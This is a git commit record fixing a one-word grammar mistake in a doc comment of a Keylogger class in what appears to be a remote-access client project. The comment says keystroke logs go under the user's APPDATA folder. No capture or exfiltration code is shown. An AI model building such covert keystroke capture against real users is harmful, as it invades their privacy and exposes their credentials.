Fixed minor grammar mistake

This commit is contained in:
MaxXor 2015-07-26 19:38:45 +02:00
parent 5d110d36ae
commit 89d5fdbc1b
1 changed files with 1 additions and 1 deletions

View File

@ -15,7 +15,7 @@ namespace xClient.Core.Utilities
/// better user experience.
/// </summary>
/// <remarks>
/// The log files with be written to the log directory which is located under '%APPDATA%\Logs\'.
/// The log files will be written to the log directory which is located under '%APPDATA%\Logs\'.
/// </remarks>
public class Keylogger : IDisposable
{